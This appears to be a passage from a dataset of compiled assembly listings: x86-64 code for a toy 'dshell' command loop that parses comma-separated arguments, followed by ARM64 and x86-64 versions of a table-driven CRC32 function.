movl $5, %esi
movb $0, %al
callq *-16(%rbp)
callq _read_filename
callq _printwc
callq _captureinput
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _signal_process ## -- Begin function signal_process
.p2align 4, 0x90
_signal_process: ## @signal_process
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
leaq L_.str.16(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
callq _abort
.cfi_endproc
## -- End function
.globl _read_filename ## -- Begin function read_filename
.p2align 4, 0x90
_read_filename: ## @read_filename
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
leaq L_.str.3(%rip), %rdi
movq _filename@GOTPCREL(%rip), %rsi
movl $80, %edx
callq _readlink
## kill: def $eax killed $eax killed $rax
movl %eax, -4(%rbp)
cmpl $0, -4(%rbp)
jl LBB5_2
## %bb.1:
cmpl $80, -4(%rbp)
jl LBB5_3
LBB5_2:
leaq L_.str.4(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $-1, %edi
callq _exit
LBB5_3:
leaq L_.str.5(%rip), %rdi
movq _filename@GOTPCREL(%rip), %rsi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _printwc ## -- Begin function printwc
.p2align 4, 0x90
_printwc: ## @printwc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _parse_cmd ## -- Begin function parse_cmd
.p2align 4, 0x90
_parse_cmd: ## @parse_cmd
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -80(%rbp)
leaq -64(%rbp), %rdi
xorl %esi, %esi
movl $56, %edx
callq _memset
movq -80(%rbp), %rdi
callq _strlen
## kill: def $eax killed $eax killed $rax
movl %eax, -96(%rbp)
movl $0, -92(%rbp)
LBB7_1: ## =>This Inner Loop Header: Depth=1
movl -92(%rbp), %eax
cmpl -96(%rbp), %eax
jge LBB7_6
## %bb.2: ## in Loop: Header=BB7_1 Depth=1
movq -80(%rbp), %rax
movslq -92(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $32, %eax
jne LBB7_4
## %bb.3:
leaq -64(%rbp), %rdi
movq -80(%rbp), %rsi
movslq -92(%rbp), %rdx
movl $56, %ecx
callq ___memcpy_chk
jmp LBB7_6
LBB7_4: ## in Loop: Header=BB7_1 Depth=1
jmp LBB7_5
LBB7_5: ## in Loop: Header=BB7_1 Depth=1
movl -92(%rbp), %eax
addl $1, %eax
movl %eax, -92(%rbp)
jmp LBB7_1
LBB7_6:
movl -92(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
movl $0, -100(%rbp)
leaq -72(%rbp), %rdi
xorl %esi, %esi
movl $8, %edx
callq _memset
movl -84(%rbp), %eax
movl %eax, -92(%rbp)
LBB7_7: ## =>This Inner Loop Header: Depth=1
movl -92(%rbp), %eax
cmpl -96(%rbp), %eax
jg LBB7_12
## %bb.8: ## in Loop: Header=BB7_7 Depth=1
movq -80(%rbp), %rax
movslq -92(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $44, %eax
jne LBB7_10
## %bb.9: ## in Loop: Header=BB7_7 Depth=1
movl -92(%rbp), %esi
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
leaq -72(%rbp), %rdi
movq -80(%rbp), %rsi
movslq -84(%rbp), %rax
addq %rax, %rsi
movl -92(%rbp), %eax
subl -84(%rbp), %eax
movslq %eax, %rdx
movl $8, %ecx
callq ___memcpy_chk
leaq -72(%rbp), %rsi
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
leaq -72(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
xorl %edx, %edx
callq _strtol
movl %eax, %ecx
movslq -100(%rbp), %rax
movl %ecx, -44(%rbp,%rax,4)
movl -92(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB7_11
LBB7_10: ## in Loop: Header=BB7_7 Depth=1
jmp LBB7_11
LBB7_11: ## in Loop: Header=BB7_7 Depth=1
movl -92(%rbp), %eax
addl $1, %eax
movl %eax, -92(%rbp)
jmp LBB7_7
LBB7_12:
movl -92(%rbp), %esi
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
leaq -72(%rbp), %rdi
movq -80(%rbp), %rsi
movslq -84(%rbp), %rax
addq %rax, %rsi
movl -96(%rbp), %eax
subl -84(%rbp), %eax
movslq %eax, %rdx
movl $8, %ecx
callq ___memcpy_chk
leaq -72(%rbp), %rsi
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
leaq -72(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
xorl %edx, %edx
callq _strtol
movl %eax, %ecx
movslq -100(%rbp), %rax
movl %ecx, -44(%rbp,%rax,4)
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
movl -100(%rbp), %esi
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
leaq -64(%rbp), %rsi
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -92(%rbp)
LBB7_13: ## =>This Inner Loop Header: Depth=1
cmpl $9, -92(%rbp)
jge LBB7_16
## %bb.14: ## in Loop: Header=BB7_13 Depth=1
movl -92(%rbp), %esi
movslq -92(%rbp), %rax
movl -44(%rbp,%rax,4), %edx
leaq L_.str.11(%rip), %rdi
movb $0, %al
callq _printf
## %bb.15: ## in Loop: Header=BB7_13 Depth=1
movl -92(%rbp), %eax
addl $1, %eax
movl %eax, -92(%rbp)
jmp LBB7_13
LBB7_16:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB7_18
## %bb.17:
xorl %eax, %eax
addq $112, %rsp
popq %rbp
retq
LBB7_18:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _do_exection ## -- Begin function do_exection
.p2align 4, 0x90
_do_exection: ## @do_exection
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rdi
leaq L_.str.12(%rip), %rsi
callq _strcmp
cmpl $0, %eax
je LBB8_2
## %bb.1:
movq -8(%rbp), %rdi
leaq L_.str.13(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB8_3
LBB8_2:
leaq L_.str.14(%rip), %rdi
xorl %eax, %eax
movl %eax, -12(%rbp) ## 4-byte Spill
callq _printf
movl -12(%rbp), %edi ## 4-byte Reload
callq _exit
LBB8_3:
movq -8(%rbp), %rax
movq %rax, -24(%rbp) ## 8-byte Spill
movq -8(%rbp), %rdi
callq _strlen
movq -24(%rbp), %rsi ## 8-byte Reload
movq %rax, %rdx
leaq L_.str.15(%rip), %rdi
movb $0, %al
callq _printf
movq -8(%rbp), %rdi
callq _parse_cmd
## %bb.4:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _readinput ## -- Begin function readinput
.p2align 4, 0x90
_readinput: ## @readinput
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
LBB9_1: ## =>This Inner Loop Header: Depth=1
callq _getchar
## kill: def $al killed $al killed $eax
movb %al, -13(%rbp)
movsbl %al, %eax
cmpl $10, %eax
je LBB9_3
## %bb.2: ## in Loop: Header=BB9_1 Depth=1
movb -13(%rbp), %dl
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movb %dl, (%rax,%rcx)
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB9_1
LBB9_3:
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movb $0, (%rax,%rcx)
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _captureinput ## -- Begin function captureinput
.p2align 4, 0x90
_captureinput: ## @captureinput
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq _inputbuff@GOTPCREL(%rip), %rdi
xorl %esi, %esi
movl $80, %edx
callq _memset
LBB10_1: ## =>This Inner Loop Header: Depth=1
leaq L_.str.17(%rip), %rdi
movb $0, %al
callq _printf
movq _inputbuff@GOTPCREL(%rip), %rdi
callq _readinput
movq _inputbuff@GOTPCREL(%rip), %rdi
callq _do_exection
jmp LBB10_1
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "func0 called\n"
L_.str.1: ## @.str.1
.asciz "func1 called para1 %d\n"
L_.str.2: ## @.str.2
.asciz "func2 called para1 %d,para2 %d\n"
L_.str.3: ## @.str.3
.asciz "/proc/self/exe"
.comm _filename,80,4 ## @filename
L_.str.4: ## @.str.4
.asciz "***Error***\n"
L_.str.5: ## @.str.5
.asciz "current absolute path:%s\n"
L_.str.6: ## @.str.6
.asciz "welcome to dshell\n"
L_.str.7: ## @.str.7
.asciz "i = %d\n"
L_.str.8: ## @.str.8
.asciz "buff %s\n"
L_.str.9: ## @.str.9
.asciz "valid arg number %d\n"
L_.str.10: ## @.str.10
.asciz "commmand %s \n"
L_.str.11: ## @.str.11
.asciz "arg[%d] %d \n"
L_.str.12: ## @.str.12
.asciz "quit"
L_.str.13: ## @.str.13
.asciz "exit"
L_.str.14: ## @.str.14
.asciz "quit dshell\n"
L_.str.15: ## @.str.15
.asciz "$$ command %s,len %ld\n"
L_.str.16: ## @.str.16
.asciz "dshell abort\n"
.comm _inputbuff,80,4 ## @inputbuff
L_.str.17: ## @.str.17
.asciz "$$ "
.subsections_via_symbols
| the_stack_data/40490.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _CalculateCrc32 ; -- Begin function CalculateCrc32
.p2align 2
_CalculateCrc32: ; @CalculateCrc32
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #48]
str x1, [sp, #40]
str x2, [sp, #32]
ldr x8, [sp, #40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_1
LBB0_1:
ldr x8, [sp, #48]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
ldr x8, [sp, #32]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
mov w8, #-1
str w8, [sp, #60]
b LBB0_9
LBB0_4:
mov w8, #-1
str w8, [sp, #28]
str xzr, [sp, #16]
ldr x8, [sp, #48]
str x8, [sp, #8]
b LBB0_5
LBB0_5: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #16]
ldr x9, [sp, #40]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB0_8
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
ldr w9, [sp, #28]
ldr w8, [sp, #28]
and w8, w8, #0xff
ldr x10, [sp, #8]
ldrb w10, [x10]
eor w10, w8, w10
adrp x8, _mCrcTable@PAGE
add x8, x8, _mCrcTable@PAGEOFF
ldr w8, [x8, w10, sxtw #2]
eor w8, w8, w9, lsr #8
str w8, [sp, #28]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=1
ldr x8, [sp, #16]
add x8, x8, #1
str x8, [sp, #16]
ldr x8, [sp, #8]
add x8, x8, #1
str x8, [sp, #8]
b LBB0_5
LBB0_8:
ldr w8, [sp, #28]
mvn w8, w8
ldr x9, [sp, #32]
str w8, [x9]
str wzr, [sp, #60]
b LBB0_9
LBB0_9:
ldr w0, [sp, #60]
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _mCrcTable ; @mCrcTable
.p2align 2
_mCrcTable:
.long 0 ; 0x0
.long 1996959894 ; 0x77073096
.long 3993919788 ; 0xee0e612c
.long 2567524794 ; 0x990951ba
.long 124634137 ; 0x76dc419
.long 1886057615 ; 0x706af48f
.long 3915621685 ; 0xe963a535
.long 2657392035 ; 0x9e6495a3
.long 249268274 ; 0xedb8832
.long 2044508324 ; 0x79dcb8a4
.long 3772115230 ; 0xe0d5e91e
.long 2547177864 ; 0x97d2d988
.long 162941995 ; 0x9b64c2b
.long 2125561021 ; 0x7eb17cbd
.long 3887607047 ; 0xe7b82d07
.long 2428444049 ; 0x90bf1d91
.long 498536548 ; 0x1db71064
.long 1789927666 ; 0x6ab020f2
.long 4089016648 ; 0xf3b97148
.long 2227061214 ; 0x84be41de
.long 450548861 ; 0x1adad47d
.long 1843258603 ; 0x6ddde4eb
.long 4107580753 ; 0xf4d4b551
.long 2211677639 ; 0x83d385c7
.long 325883990 ; 0x136c9856
.long 1684777152 ; 0x646ba8c0
.long 4251122042 ; 0xfd62f97a
.long 2321926636 ; 0x8a65c9ec
.long 335633487 ; 0x14015c4f
.long 1661365465 ; 0x63066cd9
.long 4195302755 ; 0xfa0f3d63
.long 2366115317 ; 0x8d080df5
.long 997073096 ; 0x3b6e20c8
.long 1281953886 ; 0x4c69105e
.long 3579855332 ; 0xd56041e4
.long 2724688242 ; 0xa2677172
.long 1006888145 ; 0x3c03e4d1
.long 1258607687 ; 0x4b04d447
.long 3524101629 ; 0xd20d85fd
.long 2768942443 ; 0xa50ab56b
.long 901097722 ; 0x35b5a8fa
.long 1119000684 ; 0x42b2986c
.long 3686517206 ; 0xdbbbc9d6
.long 2898065728 ; 0xacbcf940
.long 853044451 ; 0x32d86ce3
.long 1172266101 ; 0x45df5c75
.long 3705015759 ; 0xdcd60dcf
.long 2882616665 ; 0xabd13d59
.long 651767980 ; 0x26d930ac
.long 1373503546 ; 0x51de003a
.long 3369554304 ; 0xc8d75180
.long 3218104598 ; 0xbfd06116
.long 565507253 ; 0x21b4f4b5
.long 1454621731 ; 0x56b3c423
.long 3485111705 ; 0xcfba9599
.long 3099436303 ; 0xb8bda50f
.long 671266974 ; 0x2802b89e
.long 1594198024 ; 0x5f058808
.long 3322730930 ; 0xc60cd9b2
.long 2970347812 ; 0xb10be924
.long 795835527 ; 0x2f6f7c87
.long 1483230225 ; 0x58684c11
.long 3244367275 ; 0xc1611dab
.long 3060149565 ; 0xb6662d3d
.long 1994146192 ; 0x76dc4190
.long 31158534 ; 0x1db7106
.long 2563907772 ; 0x98d220bc
.long 4023717930 ; 0xefd5102a
.long 1907459465 ; 0x71b18589
.long 112637215 ; 0x6b6b51f
.long 2680153253 ; 0x9fbfe4a5
.long 3904427059 ; 0xe8b8d433
.long 2013776290 ; 0x7807c9a2
.long 251722036 ; 0xf00f934
.long 2517215374 ; 0x9609a88e
.long 3775830040 ; 0xe10e9818
.long 2137656763 ; 0x7f6a0dbb
.long 141376813 ; 0x86d3d2d
.long 2439277719 ; 0x91646c97
.long 3865271297 ; 0xe6635c01
.long 1802195444 ; 0x6b6b51f4
.long 476864866 ; 0x1c6c6162
.long 2238001368 ; 0x856530d8
.long 4066508878 ; 0xf262004e
.long 1812370925 ; 0x6c0695ed
.long 453092731 ; 0x1b01a57b
.long 2181625025 ; 0x8208f4c1
.long 4111451223 ; 0xf50fc457
.long 1706088902 ; 0x65b0d9c6
.long 314042704 ; 0x12b7e950
.long 2344532202 ; 0x8bbeb8ea
.long 4240017532 ; 0xfcb9887c
.long 1658658271 ; 0x62dd1ddf
.long 366619977 ; 0x15da2d49
.long 2362670323 ; 0x8cd37cf3
.long 4224994405 ; 0xfbd44c65
.long 1303535960 ; 0x4db26158
.long 984961486 ; 0x3ab551ce
.long 2747007092 ; 0xa3bc0074
.long 3569037538 ; 0xd4bb30e2
.long 1256170817 ; 0x4adfa541
.long 1037604311 ; 0x3dd895d7
.long 2765210733 ; 0xa4d1c46d
.long 3554079995 ; 0xd3d6f4fb
.long 1131014506 ; 0x4369e96a
.long 879679996 ; 0x346ed9fc
.long 2909243462 ; 0xad678846
.long 3663771856 ; 0xda60b8d0
.long 1141124467 ; 0x44042d73
.long 855842277 ; 0x33031de5
.long 2852801631 ; 0xaa0a4c5f
.long 3708648649 ; 0xdd0d7cc9
.long 1342533948 ; 0x5005713c
.long 654459306 ; 0x270241aa
.long 3188396048 ; 0xbe0b1010
.long 3373015174 ; 0xc90c2086
.long 1466479909 ; 0x5768b525
.long 544179635 ; 0x206f85b3
.long 3110523913 ; 0xb966d409
.long 3462522015 ; 0xce61e49f
.long 1591671054 ; 0x5edef90e
.long 702138776 ; 0x29d9c998
.long 2966460450 ; 0xb0d09822
.long 3352799412 ; 0xc7d7a8b4
.long 1504918807 ; 0x59b33d17
.long 783551873 ; 0x2eb40d81
.long 3082640443 ; 0xb7bd5c3b
.long 3233442989 ; 0xc0ba6cad
.long 3988292384 ; 0xedb88320
.long 2596254646 ; 0x9abfb3b6
.long 62317068 ; 0x3b6e20c
.long 1957810842 ; 0x74b1d29a
.long 3939845945 ; 0xead54739
.long 2647816111 ; 0x9dd277af
.long 81470997 ; 0x4db2615
.long 1943803523 ; 0x73dc1683
.long 3814918930 ; 0xe3630b12
.long 2489596804 ; 0x94643b84
.long 225274430 ; 0xd6d6a3e
.long 2053790376 ; 0x7a6a5aa8
.long 3826175755 ; 0xe40ecf0b
.long 2466906013 ; 0x9309ff9d
.long 167816743 ; 0xa00ae27
.long 2097651377 ; 0x7d079eb1
.long 4027552580 ; 0xf00f9344
.long 2265490386 ; 0x8708a3d2
.long 503444072 ; 0x1e01f268
.long 1762050814 ; 0x6906c2fe
.long 4150417245 ; 0xf762575d
.long 2154129355 ; 0x806567cb
.long 426522225 ; 0x196c3671
.long 1852507879 ; 0x6e6b06e7
.long 4275313526 ; 0xfed41b76
.long 2312317920 ; 0x89d32be0
.long 282753626 ; 0x10da7a5a
.long 1742555852 ; 0x67dd4acc
.long 4189708143 ; 0xf9b9df6f
.long 2394877945 ; 0x8ebeeff9
.long 397917763 ; 0x17b7be43
.long 1622183637 ; 0x60b08ed5
.long 3604390888 ; 0xd6d6a3e8
.long 2714866558 ; 0xa1d1937e
.long 953729732 ; 0x38d8c2c4
.long 1340076626 ; 0x4fdff252
.long 3518719985 ; 0xd1bb67f1
.long 2797360999 ; 0xa6bc5767
.long 1068828381 ; 0x3fb506dd
.long 1219638859 ; 0x48b2364b
.long 3624741850 ; 0xd80d2bda
.long 2936675148 ; 0xaf0a1b4c
.long 906185462 ; 0x36034af6
.long 1090812512 ; 0x41047a60
.long 3747672003 ; 0xdf60efc3
.long 2825379669 ; 0xa867df55
.long 829329135 ; 0x316e8eef
.long 1181335161 ; 0x4669be79
.long 3412177804 ; 0xcb61b38c
.long 3160834842 ; 0xbc66831a
.long 628085408 ; 0x256fd2a0
.long 1382605366 ; 0x5268e236
.long 3423369109 ; 0xcc0c7795
.long 3138078467 ; 0xbb0b4703
.long 570562233 ; 0x220216b9
.long 1426400815 ; 0x5505262f
.long 3317316542 ; 0xc5ba3bbe
.long 2998733608 ; 0xb2bd0b28
.long 733239954 ; 0x2bb45a92
.long 1555261956 ; 0x5cb36a04
.long 3268935591 ; 0xc2d7ffa7
.long 3050360625 ; 0xb5d0cf31
.long 752459403 ; 0x2cd99e8b
.long 1541320221 ; 0x5bdeae1d
.long 2607071920 ; 0x9b64c2b0
.long 3965973030 ; 0xec63f226
.long 1969922972 ; 0x756aa39c
.long 40735498 ; 0x26d930a
.long 2617837225 ; 0x9c0906a9
.long 3943577151 ; 0xeb0e363f
.long 1913087877 ; 0x72076785
.long 83908371 ; 0x5005713
.long 2512341634 ; 0x95bf4a82
.long 3803740692 ; 0xe2b87a14
.long 2075208622 ; 0x7bb12bae
.long 213261112 ; 0xcb61b38
.long 2463272603 ; 0x92d28e9b
.long 3855990285 ; 0xe5d5be0d
.long 2094854071 ; 0x7cdcefb7
.long 198958881 ; 0xbdbdf21
.long 2262029012 ; 0x86d3d2d4
.long 4057260610 ; 0xf1d4e242
.long 1759359992 ; 0x68ddb3f8
.long 534414190 ; 0x1fda836e
.long 2176718541 ; 0x81be16cd
.long 4139329115 ; 0xf6b9265b
.long 1873836001 ; 0x6fb077e1
.long 414664567 ; 0x18b74777
.long 2282248934 ; 0x88085ae6
.long 4279200368 ; 0xff0f6a70
.long 1711684554 ; 0x66063bca
.long 285281116 ; 0x11010b5c
.long 2405801727 ; 0x8f659eff
.long 4167216745 ; 0xf862ae69
.long 1634467795 ; 0x616bffd3
.long 376229701 ; 0x166ccf45
.long 2685067896 ; 0xa00ae278
.long 3608007406 ; 0xd70dd2ee
.long 1308918612 ; 0x4e048354
.long 956543938 ; 0x3903b3c2
.long 2808555105 ; 0xa7672661
.long 3495958263 ; 0xd06016f7
.long 1231636301 ; 0x4969474d
.long 1047427035 ; 0x3e6e77db
.long 2932959818 ; 0xaed16a4a
.long 3654703836 ; 0xd9d65adc
.long 1088359270 ; 0x40df0b66
.long 936918000 ; 0x37d83bf0
.long 2847714899 ; 0xa9bcae53
.long 3736837829 ; 0xdebb9ec5
.long 1202900863 ; 0x47b2cf7f
.long 817233897 ; 0x30b5ffe9
.long 3183342108 ; 0xbdbdf21c
.long 3401237130 ; 0xcabac28a
.long 1404277552 ; 0x53b39330
.long 615818150 ; 0x24b4a3a6
.long 3134207493 ; 0xbad03605
.long 3453421203 ; 0xcdd70693
.long 1423857449 ; 0x54de5729
.long 601450431 ; 0x23d967bf
.long 3009837614 ; 0xb3667a2e
.long 3294710456 ; 0xc4614ab8
.long 1567103746 ; 0x5d681b02
.long 711928724 ; 0x2a6f2b94
.long 3020668471 ; 0xb40bbe37
.long 3272380065 ; 0xc30c8ea1
.long 1510334235 ; 0x5a05df1b
.long 755167117 ; 0x2d02ef8d
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _CalculateCrc32 ## -- Begin function CalculateCrc32
.p2align 4, 0x90
_CalculateCrc32: ## @CalculateCrc32
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
cmpq $0, -24(%rbp)
je LBB0_3
## %bb.1:
cmpq $0, -16(%rbp)
je LBB0_3
## %bb.2:
cmpq $0, -32(%rbp)
jne LBB0_4
LBB0_3:
movl $-1, -4(%rbp)
jmp LBB0_9
LBB0_4:
movl $-1, -36(%rbp)
movq $0, -48(%rbp)
movq -16(%rbp), %rax
movq %rax, -56(%rbp)
LBB0_5: ## =>This Inner Loop Header: Depth=1
movq -48(%rbp), %rax
cmpq -24(%rbp), %rax
jae LBB0_8
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movl -36(%rbp), %eax
shrl $8, %eax
movl -36(%rbp), %ecx
## kill: def $cl killed $cl killed $ecx
movzbl %cl, %ecx
movq -56(%rbp), %rdx
movzbl (%rdx), %edx
xorl %edx, %ecx
movslq %ecx, %rdx
leaq _mCrcTable(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl %eax, -36(%rbp)
## %bb.7: ## in Loop: Header=BB0_5 Depth=1
movq -48(%rbp), %rax
addq $1, %rax
movq %rax, -48(%rbp)
movq -56(%rbp), %rax
addq $1, %rax
movq %rax, -56(%rbp)
jmp LBB0_5
LBB0_8:
movl -36(%rbp), %ecx
xorl $-1, %ecx
movq -32(%rbp), %rax
movl %ecx, (%rax)
movl $0, -4(%rbp)
LBB0_9:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _mCrcTable ## @mCrcTable
.p2align 4
_mCrcTable:
.long 0 ## 0x0
.long 1996959894 ## 0x77073096
.long 3993919788 ## 0xee0e612c
.long 2567524794 ## 0x990951ba
.long 124634137 ## 0x76dc419
.long 1886057615 ## 0x706af48f
.long 3915621685 ## 0xe963a535
.long 2657392035 ## 0x9e6495a3
.long 249268274 ## 0xedb8832
.long 2044508324 ## 0x79dcb8a4
.long 3772115230 ## 0xe0d5e91e
.long 2547177864 ## 0x97d2d988
.long 162941995 ## 0x9b64c2b
.long 2125561021 ## 0x7eb17cbd
.long 3887607047 ## 0xe7b82d07
.long 2428444049 ## 0x90bf1d91
.long 498536548 ## 0x1db71064
.long 1789927666 ## 0x6ab020f2
.long 4089016648 ## 0xf3b97148
.long 2227061214 ## 0x84be41de
.long 450548861 ## 0x1adad47d
.long 1843258603 ## 0x6ddde4eb
.long 4107580753 ## 0xf4d4b551
.long 2211677639 ## 0x83d385c7
.long 325883990 ## 0x136c9856
.long 1684777152 ## 0x646ba8c0
.long 4251122042 ## 0xfd62f97a
.long 2321926636 ## 0x8a65c9ec
.long 335633487 ## 0x14015c4f
.long 1661365465 ## 0x63066cd9
.long 4195302755 ## 0xfa0f3d63
.long 2366115317 ## 0x8d080df5
.long 997073096 ## 0x3b6e20c8
.long 1281953886 ## 0x4c69105e
.long 3579855332 ## 0xd56041e4
.long 2724688242 ## 0xa2677172
.long 1006888145 ## 0x3c03e4d1
.long 1258607687 ## 0x4b04d447
.long 3524101629 ## 0xd20d85fd
.long 2768942443 ## 0xa50ab56b
.long 901097722 ## 0x35b5a8fa
.long 1119000684 ## 0x42b2986c
.long 3686517206 ## 0xdbbbc9d6
.long 2898065728 ## 0xacbcf940
.long 853044451 ## 0x32d86ce3
.long 1172266101 ## 0x45df5c75
.long 3705015759 ## 0xdcd60dcf
.long 2882616665 ## 0xabd13d59
.long 651767980 ## 0x26d930ac
.long 1373503546 ## 0x51de003a
.long 3369554304 ## 0xc8d75180
.long 3218104598 ## 0xbfd06116
.long 565507253 ## 0x21b4f4b5
.long 1454621731 ## 0x56b3c423
.long 3485111705 ## 0xcfba9599
.long 3099436303 ## 0xb8bda50f
.long 671266974 ## 0x2802b89e
.long 1594198024 ## 0x5f058808
.long 3322730930 ## 0xc60cd9b2
.long 2970347812 ## 0xb10be924
.long 795835527 ## 0x2f6f7c87
.long 1483230225 ## 0x58684c11
.long 3244367275 ## 0xc1611dab
.long 3060149565 ## 0xb6662d3d
.long 1994146192 ## 0x76dc4190
.long 31158534 ## 0x1db7106
.long 2563907772 ## 0x98d220bc
.long 4023717930 ## 0xefd5102a
.long 1907459465 ## 0x71b18589
.long 112637215 ## 0x6b6b51f
.long 2680153253 ## 0x9fbfe4a5
.long 3904427059 ## 0xe8b8d433
.long 2013776290 ## 0x7807c9a2
.long 251722036 ## 0xf00f934
.long 2517215374 ## 0x9609a88e
.long 3775830040 ## 0xe10e9818
.long 2137656763 ## 0x7f6a0dbb
.long 141376813 ## 0x86d3d2d
.long 2439277719 ## 0x91646c97
.long 3865271297 ## 0xe6635c01
.long 1802195444 ## 0x6b6b51f4
.long 476864866 ## 0x1c6c6162
.long 2238001368 ## 0x856530d8
.long 4066508878 ## 0xf262004e
.long 1812370925 ## 0x6c0695ed
.long 453092731 ## 0x1b01a57b
.long 2181625025 ## 0x8208f4c1
.long 4111451223 ## 0xf50fc457
.long 1706088902 ## 0x65b0d9c6
.long 314042704 ## 0x12b7e950
.long 2344532202 ## 0x8bbeb8ea
.long 4240017532 ## 0xfcb9887c
.long 1658658271 ## 0x62dd1ddf
.long 366619977 ## 0x15da2d49
.long 2362670323 ## 0x8cd37cf3
.long 4224994405 ## 0xfbd44c65
.long 1303535960 ## 0x4db26158
.long 984961486 ## 0x3ab551ce
.long 2747007092 ## 0xa3bc0074
.long 3569037538 ## 0xd4bb30e2
.long 1256170817 ## 0x4adfa541
.long 1037604311 ## 0x3dd895d7
.long 2765210733 ## 0xa4d1c46d
.long 3554079995 ## 0xd3d6f4fb
.long 1131014506 ## 0x4369e96a
.long 879679996 ## 0x346ed9fc
.long 2909243462 ## 0xad678846
.long 3663771856 ## 0xda60b8d0
.long 1141124467 ## 0x44042d73
.long 855842277 ## 0x33031de5
.long 2852801631 ## 0xaa0a4c5f
.long 3708648649 ## 0xdd0d7cc9
.long 1342533948 ## 0x5005713c
.long 654459306 ## 0x270241aa
.long 3188396048 ## 0xbe0b1010
.long 3373015174 ## 0xc90c2086
.long 1466479909 ## 0x5768b525
.long 544179635 ## 0x206f85b3
.long 3110523913 ## 0xb966d409
.long 3462522015 ## 0xce61e49f
.long 1591671054 ## 0x5edef90e
.long 702138776 ## 0x29d9c998
.long 2966460450 ## 0xb0d09822
.long 3352799412 ## 0xc7d7a8b4
.long 1504918807 ## 0x59b33d17
.long 783551873 ## 0x2eb40d81
.long 3082640443 ## 0xb7bd5c3b
.long 3233442989 ## 0xc0ba6cad
.long 3988292384 ## 0xedb88320
